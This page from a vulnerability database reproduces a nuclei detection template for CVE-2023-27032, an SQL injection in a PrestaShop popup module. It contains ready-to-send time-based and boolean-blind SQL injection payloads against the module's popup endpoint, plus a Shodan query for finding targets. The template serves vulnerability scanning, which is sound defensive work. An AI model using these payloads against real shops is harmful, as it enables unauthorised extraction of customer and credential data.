Lucene search
K

PrestaShop AdvancedPopupCreator - SQL Injection

🗓️ 07 Jul 2026 03:01:27Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 181 Views

PrestaShop AdvancedPopupCreator SQL Injection vulnerability,CVE-2023-27032,severity: critica

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2023-27032
14 Feb 202510:00
circl
CNNVD
PrestaShop SQL注入漏洞
12 Apr 202300:00
cnnvd
CVE
CVE-2023-27032
12 Apr 202300:00
cve
Cvelist
CVE-2023-27032
12 Apr 202300:00
cvelist
NVD
CVE-2023-27032
12 Apr 202314:15
nvd
OSV
CVE-2023-27032
12 Apr 202314:15
osv
Prion
Sql injection
12 Apr 202314:15
prion
Positive Technologies
PT-2023-20908 · Prestashop · Prestashop Advancedpopupcreator
12 Apr 202300:00
ptsecurity
RedhatCVE
CVE-2023-27032
23 May 202502:27
redhatcve
VulnCheck KEV
VulnCheck KEV: CVE-2023-27032
15 Feb 202600:00
vulncheck_kev
Rows per page
id: CVE-2023-27032

info:
  name: PrestaShop AdvancedPopupCreator - SQL Injection
  author: MaStErChO
  severity: critical
  description: |
    In the module “Advanced Popup Creator” (advancedpopupcreator) from Idnovate for PrestaShop, a guest can perform SQL injection in affected versions.
  impact: |
    Unauthenticated attackers can execute arbitrary SQL commands to extract database contents including customer data, orders, payment information, and administrative credentials from the PrestaShop database.
  remediation: |
    Upgrade to the latest version of the Advanced Popup Creator module from Idnovate that addresses this SQL injection vulnerability.
  reference:
    - https://security.friendsofpresta.org/modules/2023/04/11/advancedpopupcreator.html
    - https://addons.prestashop.com/en/pop-up/23773-popup-on-entry-exit-popup-add-product-and-newsletter.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-27032
    cwe-id: CWE-89
    epss-score: 0.0304
    epss-percentile: 0.85917
    cpe: cpe:2.3:a:idnovate:popup_module_\(on_entering\,_exit_popup\,_add_product\)_and_newsletter:*:*:*:*:*:prestashop:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: idnovate
    product: popup_module_\(on_entering\,_exit_popup\,_add_product\)_and_newsletter
    framework: prestashop
    shodan-query: http.component:"prestashop"
  tags: time-based-sqli,cve,cve2023,sqli,prestashop,advancedpopupcreator,idnovate,vuln,vkev

flow: |
  http(1) && (http(2) || http(3))

http:
  - id: "extract_values"
    raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    host-redirects: true
    max-redirects: 5

    extractors:
      - type: regex
        name: time
        group: 1
        regex:
          - '"time":([0-9]+),'
        internal: true

      - type: regex
        name: token
        group: 1
        regex:
          - '"static_token":"([0-9a-z]+)",'
        internal: true

  - id: "time_based"
    raw:
      - |
        @timeout 20s
        POST /module/advancedpopupcreator/popup HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        availablePopups=if(now()=sysdate()%2Csleep(6)%2C0)&event=1&fromController=product&getPopup=1&id_category=0&id_manufacturer=0&id_product=1&id_supplier=0&referrer=&responsiveWidth=1280&time={{time}}&token={{token}}

      - |
        @timeout 20s
        POST /module/advancedpopupcreator/popup HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        fromController=(select(0)from(select(sleep(6)))v)/*'%2B(select(0)from(select(sleep(6)))v)%2B'"%2B(select(0)from(select(sleep(6)))v)%2B"*/&id_category=0&id_cms=1&id_manufacturer=0&id_product=0&id_supplier=0&referrer=1&responsiveWidth=1280&time={{time}}&token={{token}}&updateVisits=1&url=https%253A%252F%252F{{Hostname}}%252F

    stop-at-first-match: true
    matchers:
      - type: dsl
        name: time-based
        dsl:
          - status_code == 200
          - contains(content_type, "text/html")
          - contains_all(body,'hasError')
          - duration >= 6
        condition: and

  - id: "blind_based"
    raw:
      - |
        POST /module/advancedpopupcreator/popup HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        availablePopups=-8514)%20OR%206158%3d6158--%20eKWg&event=1&fromController=product&getPopup=1&id_category=0&id_manufacturer=0&id_product=1&id_supplier=0&referrer=&responsiveWidth=1280&time={{time}}&token={{token}}

      - |
        POST /module/advancedpopupcreator/popup HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        availablePopups=-8514)%20OR%206158%3d6157--%20eKWg&event=1&fromController=product&getPopup=1&id_category=0&id_manufacturer=0&id_product=1&id_supplier=0&referrer=&responsiveWidth=1280&time={{time}}&token={{token}}

    matchers:
      - type: dsl
        name: blind-based
        dsl:
          - 'status_code == 200'
          - 'contains(tolower(response_1), "selector")'
          - '!contains(tolower(response_2), "selector")'
        condition: and
# digest: 4b0a00483046022100db964a7fbf808ae1a60bec6e3bf474e0f68c7ee3102d1f5b4073831a1c8371750221009226e6670e3390e5893d7884c43e1657063d450acff921fae05c937f6ac0a7a0:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.2High risk
Vulners AI Score7.2
CVSS 3.19.8
EPSS0.0304
SSVC
181